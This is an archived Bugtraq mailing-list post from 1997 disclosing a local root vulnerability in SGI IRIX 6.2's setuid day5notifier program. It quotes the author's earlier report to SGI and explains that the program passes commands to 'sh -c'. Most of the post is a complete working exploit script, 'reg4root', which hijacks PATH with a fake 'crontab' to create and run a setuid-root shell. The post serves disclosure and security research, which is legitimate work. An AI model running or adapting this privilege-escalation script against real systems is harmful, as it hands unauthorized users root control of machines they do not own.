Bugtraq mailing list archives
Day5notifier (IRIX 6.2 vulnerability)
From: mcn () RIPOSTE ENGARDE COM (Mike Neuman)
Date: Fri, 16 May 1997 11:25:35 -0600
This message was sent nearly a year ago to SGI, and their customer support people still claim to have never heard of it. It only works on 6.2 (as far as I know), but 6.2 is still the only OS available for Indys. It also points out a flaw in quite a few other SGI programs. Apparently an engineer read the "How not to use the system() call", and made up his own alternative. :-)

=====

To: security-alert () sgi com
Subject: Vulnerability in IRIX 6.2
Date: Tue, 06 Aug 1996 18:29:38 -0600

Hello!

This afternoon I decided to take a close look at some of the setuid executables running on my IRIX 6.2 system. An hour later, I have at least one major problem to report. :-)

I've enclosed the exploit script below, which contains a lengthy explanation at the top of the vulnerability and why it exists. If you have any questions, please feel free to contact me!

-Mike Neuman
mcn () EnGarde com

-----

#!/bin/sh
# reg4root - Register me for Root!
#
# Exploit a bug in SGI's Registration Software
#
# -Mike Neuman
# mcn () EnGarde com
# 8/6/96
#
# The bug is contained within the /var/www/htdocs/WhatsNew/CustReg/day5notifier
# program, apparently installed by default under IRIX 6.2. It may appear in
# the other setuid root program (day5datacopier) there, but I haven't had the
# time to check.
#
# SGI is apparently trying to do the right thing (by using execv() instead of
# system()), but apparently some engineer decided that execv() was too limited
# in capabilities, so he/she translated system() to:
#
# execve("/sbin/sh", "sh", "-c", "command...")
#
# This completely eliminates any security benefits execv() had!
#
# The program probably should not be setuid root. There are at least another
# dozen potential security vulnerabilities (i.e. _RLD_* variables, race
# conditions, etc.) found just by looking at strings.
#
# Note crontab and ps are only two of the problems. There are probably others.

MYPWD=`pwd`
# Work from a fresh, empty directory so "." on PATH finds only our fake crontab.
mkdir /tmp/emptydir.$$
cd /tmp/emptydir.$$
# Fake "crontab": day5notifier runs it as root through sh -c, and it leaves
# behind a setuid-root copy of the shell.
cat <<EOF >crontab
cp /bin/sh ./suidshell
chmod 4755 suidshell
EOF
chmod +x crontab
# Put the current directory first on PATH so sh -c resolves "crontab" to ours.
PATH=.:$PATH
export PATH
/var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0
./suidshell
cd $MYPWD
rm -rf /tmp/emptydir.$$